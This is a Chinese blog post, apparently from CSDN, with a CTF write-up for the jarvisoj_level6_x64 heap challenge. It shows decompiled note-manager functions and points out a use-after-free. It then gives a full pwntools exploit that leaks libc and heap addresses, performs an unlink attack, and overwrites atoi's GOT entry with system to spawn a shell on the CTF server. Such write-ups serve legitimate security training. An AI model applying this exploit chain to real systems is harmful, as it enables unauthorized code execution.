jarvisoj_level6_x64

最新推荐文章于 2024-07-12 19:48:55 发布
最新推荐文章于 2024-07-12 19:48:55 发布
阅读量126 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62887641/article/details/132955425
版权

jarvisoj_level6_x64

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x3ff000)

64位,没开pie

在程序开始的时候,建了一个chunk,用于存放申请chunk的指针,size和flag值(检测用)

int ADD()
{
  __int64 v0; // rax
  int i; // [rsp+Ch] [rbp-14h]
  int v3; // [rsp+10h] [rbp-10h]
  void *v4; // [rsp+18h] [rbp-8h]

  if ( *(_QWORD *)(BSSPTR + 8) < *(_QWORD *)BSSPTR )
  {
    for ( i = 0; ; ++i )
    {
      v0 = *(_QWORD *)BSSPTR;
      if ( i >= *(_QWORD *)BSSPTR )
        break;
      if ( !*(_QWORD *)(BSSPTR + 24LL * i + 16) )
      {
        printf("Length of new note: ");
        v3 = READ();
        if ( v3 > 0 )
        {
          if ( v3 > 4096 )
            v3 = 4096;
          v4 = malloc((0x80 - v3 % 0x80) % 0x80 + v3);
          printf("Enter your note: ");
          READ_((__int64)v4, v3);
          *(_QWORD *)(BSSPTR + 24LL * i + 16) = 1LL;
          *(_QWORD *)(BSSPTR + 24LL * i + 24) = v3;
          *(_QWORD *)(BSSPTR + 24LL * i + 32) = v4;
          ++*(_QWORD *)(BSSPTR + 8);
          LODWORD(v0) = puts("Done.");
        }
        else
        {
          LODWORD(v0) = puts("Invalid length!");
        }
        return v0;
      }
    }
  }
  else
  {
    LODWORD(v0) = puts("Unable to create new note.");
  }
  return v0;
}

add这里,只能申请到最小是0x80大小的chunk,但是在写入content的时候,必须写满

int DELE()
{
  int v1; // [rsp+Ch] [rbp-4h]

  if ( *(__int64 *)(BSSPTR + 8) <= 0 )
    return puts("No notes yet.");
  printf("Note number: ");
  v1 = READ();
  if ( v1 < 0 || v1 >= *(_QWORD *)BSSPTR )
    return puts("Invalid number!");
  --*(_QWORD *)(BSSPTR + 8);
  *(_QWORD *)(BSSPTR + 24LL * v1 + 16) = 0LL;
  *(_QWORD *)(BSSPTR + 24LL * v1 + 24) = 0LL;
  free(*(void **)(BSSPTR + 24LL * v1 + 32));
  return puts("Done.");
}

dele这里有个uaf,用于存放chunk的指针没有置零

int sub_400D87()
{
  __int64 v1; // rbx
  int v2; // [rsp+4h] [rbp-1Ch]
  int v3; // [rsp+8h] [rbp-18h]

  printf("Note number: ");
  v3 = READ();
  if ( v3 < 0 || v3 >= *(_QWORD *)BSSPTR || *(_QWORD *)(BSSPTR + 24LL * v3 + 16) != 1LL )
    return puts("Invalid number!");
  printf("Length of note: ");
  v2 = READ();
  if ( v2 <= 0 )
    return puts("Invalid length!");
  if ( v2 > 4096 )
    v2 = 4096;
  if ( v2 != *(_QWORD *)(BSSPTR + 24LL * v3 + 24) )
  {
    v1 = BSSPTR;
    *(_QWORD *)(v1 + 24LL * v3 + 32) = realloc(*(void **)(BSSPTR + 24LL * v3 + 32), (128 - v2 % 128) % 128 + v2);
    *(_QWORD *)(BSSPTR + 24LL * v3 + 24) = v2;
  }
  printf("Enter your note: ");
  READ_(*(_QWORD *)(BSSPTR + 24LL * v3 + 32), (unsigned int)v2);
  return puts("Done.");
}

edit这里,正常修改就可

int SHOW()
{
  __int64 v0; // rax
  unsigned int i; // [rsp+Ch] [rbp-4h]

  if ( *(__int64 *)(BSSPTR + 8) <= 0 )
  {
    LODWORD(v0) = puts("You need to create some new notes first.");
  }
  else
  {
    for ( i = 0; ; ++i )
    {
      v0 = *(_QWORD *)BSSPTR;
      if ( (int)i >= *(_QWORD *)BSSPTR )
        break;
      if ( *(_QWORD *)(BSSPTR + 24LL * (int)i + 16) == 1LL )
        printf("%d. %s\n", i, *(const char **)(BSSPTR + 24LL * (int)i + 32));
    }
  }
  return v0;
}

show这里的话,会通过flag值是否show,

思路

使用show函数泄露libc和heap地址,然后unlink

改got,atoi@got – > system – > /bin/sh

from pwn import*
from Yapack import *
libc=ELF('libc-2.23.so')

r,elf=rec("node4.buuoj.cn",26703,"./pwn",10)
context(os='linux', arch='amd64',log_level='debug')

add(0x80,b'a'*0x80)
add(0x80,b'a'*0x80)
add(0x80,b'a'*0x80)
add(0x10,b'a'*0x10)
dele(0)
dele(2)
#这里是为了防止堆合并,用于泄露libc和heapbase
add(0x8,b'a'*0x8)
add(0x8,b'b'*0x8)
show()
ru(b'a'*8)
heap=u64(r.recv(3).ljust(8,b'\x00'))-0x1940+0x30
leak=get_addr_u64()-88-0x10-mallochook()
sys=p64(system(leak))
li(heap)
li(leak)
dele(0)
dele(1)
dele(2)
dele(3)
#debug()

pl=p64(0)+p64(0x110)+p64(heap-0x18)+p64(heap-0x10)
add(len(pl),pl)
pl=b'a' * 0x80 + p64(0x110) + p64(0x90) + b'A' * 0x80 + p64(0) + p64(0x91) + b'a' * 0x80
add(len(pl),pl)
#这里看下面图图,利用uaf和unlink,进入到chunk1,改指针了,改got
dele(2)
pl=b'a' * 8 + p64(1) + p64(8) + p64(elf.got['atoi'])
edit(0,len(pl),pl)
li(leak)
edit(0,len(sys),sys)
sl(b'/bin/sh\x00')
#debug()
ia()

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

YameMres
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jarvisoj_level6_x64(buuctf)--unlink利用
weixin_45427676的博客
04-14 576
这道题利用了unlink,unlink的利用原理我已经讲过了,以这个题来实列操作一下,加深对unlink利用的认识 查看保护机制 程序分析 在IDA查看一下主函数 可以看到程序中有四个功能函数,该程序是一个记事本程序,功能上基本就是添加记录、打印列出所有记录、编辑记录、删除记录。简单分析一下各函数的作用。 1、sub_400a49:创建记录索引表,具体就是分配一个大堆,堆里面存了各条记录存储区...
jarvisoj)(pwn)guestbook2/level6_x64
PLpa的博客
08-28 1108
guestbook2和level6_x64真的是一摸一样的,两个题目除了提示文字不同,其他的漏洞根本一样,鉴于jarvisoj中的pwn服务器比pwn2服务器要稳定一点,所以这里就写guestbook2。 前言: 这里,我提供两种方法解题,一种是利用unlink的任意地址读写功能泄露libc基址,一种是用unsorted bin和use after free来泄露libc基址,两种方法都行。 漏洞...
jarvis oj level6
发蝴蝶和大脑斧的博客
01-10 1157
原来的附件有点问题,重新发过了. 主要用了两个技术:1.溢出泄露libc地址,heap地址.2.unsafe_unlink,这个how2pwn上unsafe_unlink.c里写的很清楚. 首先看泄露libc地址 New("A"*0x80)#0 New("B"*0x80)#1 Delete(0) New("123") List() c=p.recvuntil('AAAA') leak_addr=u...
jarvis guestbook2 / level6_x64
发蝴蝶和大脑斧的博客
03-12 838
level6思路相同,只是在x64运行。 遇到几个问题: 1.[DEBUG] Received 0x4e bytes: &quot;*** Error in guestbook2: realloc(): invalid pointer: 0x0000000001dcb018 ***\n&quot; 调试了半天发现是当新块的大小与原来不一致时都会调用realloc,所以要填充的时候要仔细。 2.原本想这样泄漏libc...
HttpClient_canalvwb_qthttpserver_levell6x_use_httpclient_
09-30
在"HttpClient_canalvwb_qthttpserver_levell6x_use_httpclient_"这个标题中,我们可以推断这是一个关于如何在QT服务器(QTHttpServer)上使用HttpClient进行通信的示例。"canalvwb"可能是项目或团队名,而"levell6x...
uTinyRipper_x64 (2)_uTinyRipper_x64_
10-01
《uTinyRipper_x64:Unity资源提取利器详解》 在数字娱乐产业中,Unity引擎因其强大的功能和易用性,已经成为许多开发者首选的游戏开发工具。然而,有时我们可能需要从Unity游戏或应用程序中提取资源,如模型、纹理...
LRVOSUN.rar_level set_level set model
07-14
A new level set model without initialization, very time effi
level_set_image.rar_level set_level set 方程
09-21
这个"level_set_image.rar_level set_level set 方程"的压缩包内容可能包含了一个名为"level_set_image.m"的MATLAB程序,用于演示或实现Level Set方法在图像处理中的应用。 Level Set方法的核心在于用一个标量函数...
Level_Set.zip_level set_level-set_set
07-15
这个"Level Set.zip_level set_level-set_set"压缩包文件包含了一个名为"Level_Set.m"的MATLAB程序,用于执行Level Set算法。 Level Set方法的核心思想是将图像中的边界或形状表示为一个零水平集(level set)函数...
jarvis level6_x64堆溢出unlink拾遗
weixin_30274627的博客
11-16 172
level6 32位的我没有调出来,貌似32位的堆结构和64位不太一样,嘤嘤嘤?,所以做了一下这个64位的,题目地址,level6_x64 首先看一下程序的结构体 struct list //0x1810 { int all=256; int now_sum; struct _note *note; } struct _note { ...
BUUCTF pwn wp 136 - 140
fa1c4的blog
04-28 511
pwnable_asm picoctf_2018_echooo jarvisoj_level6_x64 npuctf_2020_level2 [2020 新春红包题]3
BUUCTF-PWN刷题记录-3
weixin_44145820的博客
03-31 844
目录hitcontraining_heapcreator hitcontraining_heapcreator 考虑修改GOT表 在edit函数中可以溢出一个byte 这题需要利用堆重叠的方法,因为free之后会置空,只能利用堆重叠进行重复分配 利用思路如下: 先申请三个heap,其中heap[0]的内容大小为8的奇数倍 使用edit溢出修改heap[1]的chunk的size,把heap[...
Javisoj_level6_x64_writeup
热门推荐
yeshen4328的专栏
10-14 2万+
freenote writeup 目的 学习pwn基本套路 学习堆相关漏洞和利用:unlink、堆的结构、free的流程 题目 笔记本题目: 4个重要选项如上所示,选项代码如下所示: InitNote: 初始化整个note的内存,共0x1810字节,前16字节为头部信息,分别是最大note数(note_buf: 0x100),当前note数(note_buf+8: 0); 接下来初始化每个note的结构,每个note 24字节,第一个8字节(note_buf + 24*i + 16)表示该note
DNSSec:网络安全的守护者
jiamisoft的博客
07-12 270
DNSSec是一种安全协议,它为DNS查询和响应过程提供了额外的加密层。通过使用公钥基础设施(PKI)和数字签名,DNSSec能够验证DNS响应的真实性,从而防止DNS欺骗攻击,即攻击者将用户重定向到恶意网站的行为。
医疗健康信息的安全挑战与隐私保护最佳实践
2301_79955948的博客
07-12 549
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
移动互联安全扩展要求测评项
hakksjss的博客
07-10 966
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
安全防御-用户认证综合实验
最新发布
weixin_69863399的博客
07-12 191
生产区访问DMZ需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab@123,首次登录需要修改密码,用户过期时间设定为10天,用户不允许多人使用。游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。做相关的认证策略,研发部IP地址(10.0.1.20)固定,访问DMZ区使用匿名认证,研发部需要用户绑定IP地址,访问DMZ区使用免认证;
警钟!电池储能安全事故频发!物联网技术如何加强储能安全排查?
olzorange的博客
07-08 421
物联网技术的应用为储能安全排查提供了从源头预防到快速响应的全链条解决方案。
jarvisoj_level0
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值